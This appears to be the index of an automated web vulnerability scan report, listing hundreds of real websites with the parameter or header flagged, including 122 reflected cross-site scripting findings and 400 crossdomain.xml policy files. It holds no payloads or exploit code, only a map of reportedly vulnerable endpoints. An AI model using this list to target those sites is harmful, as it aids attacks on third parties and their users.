1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]
1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]
1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]
1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]
1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]
1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]
1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]
1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]
1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]
1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]
1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]
1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]
2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]
2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]
2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]
2.4. http://www.info.com/favicon.ico [REST URL parameter 1]
3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]
3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]
3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]
3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]
5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]
5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]
5.3. http://www.health.com/favicon.ico [REST URL parameter 1]
5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]
5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]
5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]
5.7. http://www.people.com/favicon.ico [REST URL parameter 1]
5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]
5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]
5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]
5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]
5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]
5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]
5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]
6. Cross-site scripting (reflected)
6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]
6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]
6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]
6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]
6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]
6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]
6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]
6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]
6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]
6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]
6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]
6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]
6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]
6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]
6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]
6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]
6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]
6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]
6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]
6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]
6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]
6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]
6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]
6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]
6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]
6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]
6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]
6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]
6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]
6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]
6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]
6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]
6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]
6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]
6.37. http://www.education.com/favicon.ico [REST URL parameter 1]
6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]
6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]
6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]
6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]
6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]
6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]
6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]
6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]
6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]
6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]
6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]
6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]
6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]
6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]
6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]
6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]
6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]
6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]
6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]
6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]
6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]
6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]
6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]
6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]
6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]
6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]
6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]
6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]
6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]
6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]
6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]
6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]
6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]
6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]
6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]
6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]
6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]
6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]
6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]
6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]
6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]
6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]
6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]
6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]
6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]
6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]
6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]
6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]
6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]
6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]
6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]
6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]
6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]
6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]
6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]
6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]
6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]
6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]
6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]
6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]
6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]
6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]
6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]
6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]
6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]
6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]
6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]
6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]
6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]
6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]
6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]
6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]
6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]
6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]
7.1. http://ad.doubleclick.net/crossdomain.xml
7.2. http://fls.doubleclick.net/crossdomain.xml
7.3. http://s0.2mdn.net/crossdomain.xml
7.4. http://smp.adviva.net/crossdomain.xml
7.5. http://www.43things.com/crossdomain.xml
7.6. http://www.about.com/crossdomain.xml
7.7. http://www.accesshollywood.com/crossdomain.xml
7.8. http://www.accuweather.com/crossdomain.xml
7.9. http://www.addictinggames.com/crossdomain.xml
7.10. http://www.adriver.ru/crossdomain.xml
7.11. http://www.ajc.com/crossdomain.xml
7.12. http://www.allvoices.com/crossdomain.xml
7.13. http://www.ally.com/crossdomain.xml
7.14. http://www.ancestry.com/crossdomain.xml
7.15. http://www.answerstv.com/crossdomain.xml
7.16. http://www.apartmenthomeliving.com/crossdomain.xml
7.17. http://www.apartments.com/crossdomain.xml
7.18. http://www.archive.org/crossdomain.xml
7.19. http://www.askmen.com/crossdomain.xml
7.20. http://www.atom.com/crossdomain.xml
7.21. http://www.babelgum.com/crossdomain.xml
7.22. http://www.biblegateway.com/crossdomain.xml
7.23. http://www.bigpoint.com/crossdomain.xml
7.24. http://www.bizjournals.com/crossdomain.xml
7.25. http://www.blackberry.com/crossdomain.xml
7.26. http://www.blogs.com/crossdomain.xml
7.27. http://www.bloomberg.com/crossdomain.xml
7.28. http://www.boostmobile.com/crossdomain.xml
7.29. http://www.bravotv.com/crossdomain.xml
7.30. http://www.break.com/crossdomain.xml
7.31. http://www.buzznet.com/crossdomain.xml
7.32. http://www.cafemom.com/crossdomain.xml
7.33. http://www.cbs.com/crossdomain.xml
7.34. http://www.cbsinteractive.com/crossdomain.xml
7.35. http://www.cbssports.com/crossdomain.xml
7.36. http://www.clear-request.com/crossdomain.xml
7.37. http://www.cmt.com/crossdomain.xml
7.38. http://www.colbertnation.com/crossdomain.xml
7.39. http://www.collegehumor.com/crossdomain.xml
7.40. http://www.comedycentral.com/crossdomain.xml
7.41. http://www.contactatonce.com/crossdomain.xml
7.42. http://www.cracked.com/crossdomain.xml
7.43. http://www.crackle.com/crossdomain.xml
7.44. http://www.craveonline.com/crossdomain.xml
7.45. http://www.curse.com/crossdomain.xml
7.46. http://www.daylife.com/crossdomain.xml
7.47. http://www.degrees.info/crossdomain.xml
7.48. http://www.docstoc.com/crossdomain.xml
7.49. http://www.doctoroz.com/crossdomain.xml
7.50. http://www.ebaumsworld.com/crossdomain.xml
7.51. http://www.education.com/crossdomain.xml
7.52. http://www.ehow.co.uk/crossdomain.xml
7.53. http://www.eventful.com/crossdomain.xml
7.54. http://www.everydayhealth.com/crossdomain.xml
7.55. http://www.evtv1.com/crossdomain.xml
7.56. http://www.ew.com/crossdomain.xml
7.57. http://www.ez-tracks.com/crossdomain.xml
7.58. http://www.flixster.com/crossdomain.xml
7.59. http://www.freeonlinegames.com/crossdomain.xml
7.60. http://www.g4tv.com/crossdomain.xml
7.61. http://www.gamerdna.com/crossdomain.xml
7.62. http://www.gamesradar.com/crossdomain.xml
7.63. http://www.gametrailers.com/crossdomain.xml
7.64. http://www.gourmandia.com/crossdomain.xml
7.65. http://www.greenwichmeantime.com/crossdomain.xml
7.66. http://www.groupon.com/crossdomain.xml
7.67. http://www.health.com/crossdomain.xml
7.68. http://www.hiconversion.com/crossdomain.xml
7.69. http://www.hodesiq.com/crossdomain.xml
7.70. http://www.hollywoodreporter.com/crossdomain.xml
7.71. http://www.howstuffworks.com/crossdomain.xml
7.72. http://www.huffingtonpost.com/crossdomain.xml
7.73. http://www.imagebam.com/crossdomain.xml
7.74. http://www.imageshack.us/crossdomain.xml
7.75. http://www.ingdirect.com/crossdomain.xml
7.76. http://www.instructables.com/crossdomain.xml
7.77. http://www.instyle.com/crossdomain.xml
7.78. http://www.intellicast.com/crossdomain.xml
7.79. http://www.kaboodle.com/crossdomain.xml
7.80. http://www.like.com/crossdomain.xml
7.81. http://www.liveleak.com/crossdomain.xml
7.82. http://www.manualsonline.com/crossdomain.xml
7.83. http://www.mapquest.com/crossdomain.xml
7.84. http://www.marthastewart.com/crossdomain.xml
7.85. http://www.mate1.net/crossdomain.xml
7.86. http://www.menshealth.com/crossdomain.xml
7.87. http://www.metacafe.com/crossdomain.xml
7.88. http://www.metrolyrics.com/crossdomain.xml
7.89. http://www.minorleaguebaseball.com/crossdomain.xml
7.90. http://www.mlb.com/crossdomain.xml
7.91. http://www.mmo-champion.com/crossdomain.xml
7.92. http://www.mtv.com/crossdomain.xml
7.93. http://www.myrecipes.com/crossdomain.xml
7.94. http://www.ncm.com/crossdomain.xml
7.95. http://www.newser.com/crossdomain.xml
7.96. http://www.newsok.com/crossdomain.xml
7.97. http://www.nickjr.com/crossdomain.xml
7.98. http://www.nola.com/crossdomain.xml
7.99. http://www.nydailynews.com/crossdomain.xml
7.100. http://www.oodle.com/crossdomain.xml
7.101. http://www.openforum.com/crossdomain.xml
7.102. http://www.opportunity.co/crossdomain.xml
7.103. http://www.outdoorchannel.com/crossdomain.xml
7.104. http://www.pcworld.com/crossdomain.xml
7.105. http://www.people.com/crossdomain.xml
7.106. http://www.peoplestylewatch.com/crossdomain.xml
7.107. http://www.pittsburghlive.com/crossdomain.xml
7.108. http://www.playfin.com/crossdomain.xml
7.109. http://www.pokerstars.com/crossdomain.xml
7.110. http://www.popularscreensavers.com/crossdomain.xml
7.111. http://www.rawtube.com/crossdomain.xml
7.112. http://www.realsimple.com/crossdomain.xml
7.113. http://www.redorbit.com/crossdomain.xml
7.114. http://www.scout.com/crossdomain.xml
7.115. http://www.sendspace.com/crossdomain.xml
7.116. http://www.sfgate.com/crossdomain.xml
7.117. http://www.sheknows.com/crossdomain.xml
7.118. http://www.shockwave.com/crossdomain.xml
7.119. http://www.slideshare.net/crossdomain.xml
7.120. http://www.spike.com/crossdomain.xml
7.121. http://www.sportsnetwork.com/crossdomain.xml
7.122. http://www.swagbucks.com/crossdomain.xml
7.123. http://www.syfy.com/crossdomain.xml
7.124. http://www.tampabay.com/crossdomain.xml
7.125. http://www.tastebook.com/crossdomain.xml
7.126. http://www.teennick.com/crossdomain.xml
7.127. http://www.terra.com/crossdomain.xml
7.128. http://www.thedailybeast.com/crossdomain.xml
7.129. http://www.thedailyshow.com/crossdomain.xml
7.130. http://www.theonion.com/crossdomain.xml
7.131. http://www.thisoldhouse.com/crossdomain.xml
7.132. http://www.time.com/crossdomain.xml
7.133. http://www.totalbeauty.com/crossdomain.xml
7.134. http://www.travelpod.com/crossdomain.xml
7.135. http://www.urbanspoon.com/crossdomain.xml
7.136. http://www.ustream.tv/crossdomain.xml
7.137. http://www.vh1.com/crossdomain.xml
7.138. http://www.videosurf.com/crossdomain.xml
7.139. http://www.weather.gov/crossdomain.xml
7.140. http://www.weatherbug.com/crossdomain.xml
7.141. http://www.webkinz.com/crossdomain.xml
7.142. http://www.webmd.com/crossdomain.xml
7.143. http://www.wix.com/crossdomain.xml
7.144. http://www.wowhead.com/crossdomain.xml
7.145. http://www.wunderground.com/crossdomain.xml
7.146. http://www.xanga.com/crossdomain.xml
7.147. http://www.yardbarker.com/crossdomain.xml
7.148. http://www.yfrog.com/crossdomain.xml
7.149. http://www.younghollywood.com/crossdomain.xml
7.150. http://www.yourfilehost.com/crossdomain.xml
7.151. http://www.zillow.com/crossdomain.xml
7.152. http://www.zoosnet.net/crossdomain.xml
7.153. http://www.zvents.com/crossdomain.xml
7.154. http://googleads.g.doubleclick.net/crossdomain.xml
7.155. http://pagead2.googlesyndication.com/crossdomain.xml
7.156. http://www.123greetings.com/crossdomain.xml
7.157. http://www.4shared.com/crossdomain.xml
7.158. http://www.4tubemate.com/crossdomain.xml
7.159. http://www.6pm.com/crossdomain.xml
7.160. http://www.acehardware.com/crossdomain.xml
7.161. http://www.adobe.com/crossdomain.xml
7.162. http://www.ae.com/crossdomain.xml
7.163. http://www.aeropostale.com/crossdomain.xml
7.164. http://www.allbusiness.com/crossdomain.xml
7.165. http://www.allposters.com/crossdomain.xml
7.166. http://www.allrecipes.com/crossdomain.xml
7.167. http://www.altavista.com/crossdomain.xml
7.168. http://www.amazon.co.uk/crossdomain.xml
7.169. http://www.americangreetings.com/crossdomain.xml
7.170. http://www.aolnews.com/crossdomain.xml
7.171. http://www.apple.com/crossdomain.xml
7.172. http://www.associatedcontent.com/crossdomain.xml
7.173. http://www.astrology.com/crossdomain.xml
7.174. http://www.att.com/crossdomain.xml
7.175. http://www.azcentral.com/crossdomain.xml
7.176. http://www.babiesrus.com/crossdomain.xml
7.177. http://www.babycenter.com/crossdomain.xml
7.178. http://www.barackobama.com/crossdomain.xml
7.179. http://www.barbie.com/crossdomain.xml
7.180. http://www.barnesandnoble.com/crossdomain.xml
7.181. http://www.bathandbodyworks.com/crossdomain.xml
7.182. http://www.bbc.co.uk/crossdomain.xml
7.183. http://www.bettycrocker.com/crossdomain.xml
7.184. http://www.blastro.com/crossdomain.xml
7.185. http://www.blogtv.com/crossdomain.xml
7.186. http://www.bluemountain.com/crossdomain.xml
7.187. http://www.bnet.com/crossdomain.xml
7.188. http://www.bodybuilding.com/crossdomain.xml
7.189. http://www.britannica.com/crossdomain.xml
7.190. http://www.businessweek.com/crossdomain.xml
7.191. http://www.buy.com/crossdomain.xml
7.192. http://www.cabelas.com/crossdomain.xml
7.193. http://www.canada.com/crossdomain.xml
7.194. http://www.candystand.com/crossdomain.xml
7.195. http://www.caranddriver.com/crossdomain.xml
7.196. http://www.careerbuilder.com/crossdomain.xml
7.197. http://www.careerrookie.com/crossdomain.xml
7.198. http://www.carnival.com/crossdomain.xml
7.199. http://www.cars.com/crossdomain.xml
7.200. http://www.cartoonnetwork.com/crossdomain.xml
7.201. http://www.casttv.com/crossdomain.xml
7.202. http://www.cbc.ca/crossdomain.xml
7.203. http://www.cbsnews.com/crossdomain.xml
7.204. http://www.chacha.com/crossdomain.xml
7.205. http://www.charlotteobserver.com/crossdomain.xml
7.206. http://www.chemistry.com/crossdomain.xml
7.207. http://www.chevrolet.com/crossdomain.xml
7.208. http://www.chicagotribune.com/crossdomain.xml
7.209. http://www.chow.com/crossdomain.xml
7.210. http://www.chron.com/crossdomain.xml
7.211. http://www.cisco.com/crossdomain.xml
7.212. http://www.classmates.com/crossdomain.xml
7.213. http://www.clocklink.com/crossdomain.xml
7.214. http://www.clubpenguin.com/crossdomain.xml
7.215. http://www.cnbc.com/crossdomain.xml
7.216. http://www.cnet.com/crossdomain.xml
7.217. http://www.cnn.com/crossdomain.xml
7.218. http://www.cobaltnitra.com/crossdomain.xml
7.219. http://www.collegeboard.com/crossdomain.xml
7.220. http://www.comcast.net/crossdomain.xml
7.221. http://www.consumerreports.org/crossdomain.xml
7.222. http://www.consumersearch.com/crossdomain.xml
7.223. http://www.costco.com/crossdomain.xml
7.224. http://www.dailyfinance.com/crossdomain.xml
7.225. http://www.dailykos.com/crossdomain.xml
7.226. http://www.dailymotion.com/crossdomain.xml
7.227. http://www.dallascowboys.com/crossdomain.xml
7.228. http://www.dallasnews.com/crossdomain.xml
7.229. http://www.datpiff.com/crossdomain.xml
7.230. http://www.dell.com/crossdomain.xml
7.231. http://www.demdex.net/crossdomain.xml
7.232. http://www.dickssportinggoods.com/crossdomain.xml
7.233. http://www.directv.com/crossdomain.xml
7.234. http://www.discovery.com/crossdomain.xml
7.235. http://www.diynetwork.com/crossdomain.xml
7.236. http://www.dslreports.com/crossdomain.xml
7.237. http://www.dt00.net/crossdomain.xml
7.238. http://www.ebay.ca/crossdomain.xml
7.239. http://www.economist.com/crossdomain.xml
7.240. http://www.edmunds.com/crossdomain.xml
7.241. http://www.eharmony.com/crossdomain.xml
7.242. http://www.elle.com/crossdomain.xml
7.243. http://www.emedtv.com/crossdomain.xml
7.244. http://www.engadget.com/crossdomain.xml
7.245. http://www.entertonement.com/crossdomain.xml
7.246. http://www.eonline.com/crossdomain.xml
7.247. http://www.epa.gov/crossdomain.xml
7.248. http://www.etsy.com/crossdomain.xml
7.249. http://www.evite.com/crossdomain.xml
7.250. http://www.expedia.com/crossdomain.xml
7.251. http://www.factmonster.com/crossdomain.xml
7.252. http://www.familyeducation.com/crossdomain.xml
7.253. http://www.famousfootwear.com/crossdomain.xml
7.254. http://www.fandango.com/crossdomain.xml
7.255. http://www.fanfiction.net/crossdomain.xml
7.256. http://www.fanpop.com/crossdomain.xml
7.257. http://www.fantage.com/crossdomain.xml
7.258. http://www.fastcompany.com/crossdomain.xml
7.259. http://www.fedex.com/crossdomain.xml
7.260. http://www.fidelity.com/crossdomain.xml
7.261. http://www.finishline.com/crossdomain.xml
7.262. http://www.food.com/crossdomain.xml
7.263. http://www.foodnetwork.com/crossdomain.xml
7.264. http://www.forbes.com/crossdomain.xml
7.265. http://www.freelotto.com/crossdomain.xml
7.266. http://www.ft.com/crossdomain.xml
7.267. http://www.ftd.com/crossdomain.xml
7.268. http://www.funbrain.com/crossdomain.xml
7.269. http://www.funnyordie.com/crossdomain.xml
7.270. http://www.gaiaonline.com/crossdomain.xml
7.271. http://www.gamespot.com/crossdomain.xml
7.272. http://www.gamestop.com/crossdomain.xml
7.273. http://www.gamevance.com/crossdomain.xml
7.274. http://www.gap.com/crossdomain.xml
7.275. http://www.gather.com/crossdomain.xml
7.276. http://www.geico.com/crossdomain.xml
7.277. http://www.gifts.com/crossdomain.xml
7.278. http://www.godaddy.com/crossdomain.xml
7.279. http://www.goodreads.com/crossdomain.xml
7.280. http://www.guardian.co.uk/crossdomain.xml
7.281. http://www.hallmark.com/crossdomain.xml
7.282. http://www.hbo.com/crossdomain.xml
7.283. http://www.healthcentral.com/crossdomain.xml
7.284. http://www.hgtv.com/crossdomain.xml
7.285. http://www.hhs.gov/crossdomain.xml
7.286. http://www.hi5.com/crossdomain.xml
7.287. http://www.history.com/crossdomain.xml
7.288. http://www.hollywood.com/crossdomain.xml
7.289. http://www.hollywoodlife.com/crossdomain.xml
7.290. http://www.homedepot.com/crossdomain.xml
7.291. http://www.hp.com/crossdomain.xml
7.292. http://www.hsn.com/crossdomain.xml
7.293. http://www.hulu.com/crossdomain.xml
7.294. http://www.ichotelsgroup.com/crossdomain.xml
7.295. http://www.ikea.com/crossdomain.xml
7.296. http://www.ilike.com/crossdomain.xml
7.297. http://www.imdb.com/crossdomain.xml
7.298. http://www.indiatimes.com/crossdomain.xml
7.299. http://www.infoplease.com/crossdomain.xml
7.300. http://www.intel.com/crossdomain.xml
7.301. http://www.intuit.com/crossdomain.xml
7.302. http://www.ioffer.com/crossdomain.xml
7.303. http://www.istockphoto.com/crossdomain.xml
7.304. http://www.itt-tech.edu/crossdomain.xml
7.305. http://www.iwin.com/crossdomain.xml
7.306. http://www.jtv.com/crossdomain.xml
7.307. http://www.justin.tv/crossdomain.xml
7.308. http://www.kaboose.com/crossdomain.xml
7.309. http://www.kbb.com/crossdomain.xml
7.310. http://www.kenexa.com/crossdomain.xml
7.311. http://www.king.com/crossdomain.xml
7.312. http://www.kmart.com/crossdomain.xml
7.313. http://www.kodakgallery.com/crossdomain.xml
7.314. http://www.kraftrecipes.com/crossdomain.xml
7.315. http://www.krillion.com/crossdomain.xml
7.316. http://www.last.fm/crossdomain.xml
7.317. http://www.latimes.com/crossdomain.xml
7.318. http://www.legacy.com/crossdomain.xml
7.319. http://www.lego.com/crossdomain.xml
7.320. http://www.livecams.com/crossdomain.xml
7.321. http://www.livenation.com/crossdomain.xml
7.322. http://www.llbean.com/crossdomain.xml
7.323. http://www.macys.com/crossdomain.xml
7.324. http://www.mail.com/crossdomain.xml
7.325. http://www.marykay.com/crossdomain.xml
7.326. http://www.mastercard.com/crossdomain.xml
7.327. http://www.match.com/crossdomain.xml
7.328. http://www.mcafee.com/crossdomain.xml
7.329. http://www.medcohealth.com/crossdomain.xml
7.330. http://www.medscape.com/crossdomain.xml
7.331. http://www.meebo.com/crossdomain.xml
7.332. http://www.meetlocals.com/crossdomain.xml
7.333. http://www.meetup.com/crossdomain.xml
7.334. http://www.megaupload.com/crossdomain.xml
7.335. http://www.megavideo.com/crossdomain.xml
7.336. http://www.merck.com/crossdomain.xml
7.337. http://www.merriam-webster.com/crossdomain.xml
7.338. http://www.military.com/crossdomain.xml
7.339. http://www.mindjolt.com/crossdomain.xml
7.340. http://www.miniclip.com/crossdomain.xml
7.341. http://www.miracleworkers.com/crossdomain.xml
7.342. http://www.mocospace.com/crossdomain.xml
7.343. http://www.modelmayhem.com/crossdomain.xml
7.344. http://www.moshimonsters.com/crossdomain.xml
7.345. http://www.moviesunlimited.com/crossdomain.xml
7.346. http://www.msnbc.com/crossdomain.xml
7.347. http://www.mybloglog.com/crossdomain.xml
7.348. http://www.mycokerewards.com/crossdomain.xml
7.349. http://www.myheritage.com/crossdomain.xml
7.350. http://www.mylifetime.com/crossdomain.xml
7.351. http://www.myspace.com/crossdomain.xml
7.352. http://www.myxer.com/crossdomain.xml
7.353. http://www.myyearbook.com/crossdomain.xml
7.354. http://www.nascar.com/crossdomain.xml
7.355. http://www.nationalgeographic.com/crossdomain.xml
7.356. http://www.nba.com/crossdomain.xml
7.357. http://www.nbc.com/crossdomain.xml
7.358. http://www.nbcnewyork.com/crossdomain.xml
7.359. http://www.netflix.com/crossdomain.xml
7.360. http://www.newegg.com/crossdomain.xml
7.361. http://www.newport-news.com/crossdomain.xml
7.362. http://www.newsvine.com/crossdomain.xml
7.363. http://www.newsweek.com/crossdomain.xml
7.364. http://www.nfl.com/crossdomain.xml
7.365. http://www.nhl.com/crossdomain.xml
7.366. http://www.nike.com/crossdomain.xml
7.367. http://www.npr.org/crossdomain.xml
7.368. http://www.nwsource.com/crossdomain.xml
7.369. http://www.nypost.com/crossdomain.xml
7.370. http://www.nytimes.com/crossdomain.xml
7.371. http://www.opentable.com/crossdomain.xml
7.372. http://www.opera.com/crossdomain.xml
7.373. http://www.opinionshere.com/crossdomain.xml
7.374. http://www.oprah.com/crossdomain.xml
7.375. http://www.oracle.com/crossdomain.xml
7.376. http://www.ourstage.com/crossdomain.xml
7.377. http://www.overstock.com/crossdomain.xml
7.378. http://www.pandora.com/crossdomain.xml
7.379. http://www.parentsconnect.com/crossdomain.xml
7.380. http://www.partypoker.com/crossdomain.xml
7.381. http://www.paypal.com/crossdomain.xml
7.382. http://www.pbs.org/crossdomain.xml
7.383. http://www.pch.com/crossdomain.xml
7.384. http://www.pchlotto.com/crossdomain.xml
7.385. http://www.petfinder.com/crossdomain.xml
7.386. http://www.petside.com/crossdomain.xml
7.387. http://www.petsmart.com/crossdomain.xml
7.388. http://www.pga.com/crossdomain.xml
7.389. http://www.pgatour.com/crossdomain.xml
7.390. http://www.philly.com/crossdomain.xml
7.391. http://www.picnik.com/crossdomain.xml
7.392. http://www.playsushi.com/crossdomain.xml
7.393. http://www.plentyoffish.com/crossdomain.xml
7.394. http://www.pogo.com/crossdomain.xml
7.395. http://www.politico.com/crossdomain.xml
7.396. http://www.politicsdaily.com/crossdomain.xml
7.397. http://www.poptropica.com/crossdomain.xml
7.398. http://www.potterybarn.com/crossdomain.xml
7.399. http://www.progressive.com/crossdomain.xml
7.400. http://www.psu.edu/crossdomain.xml
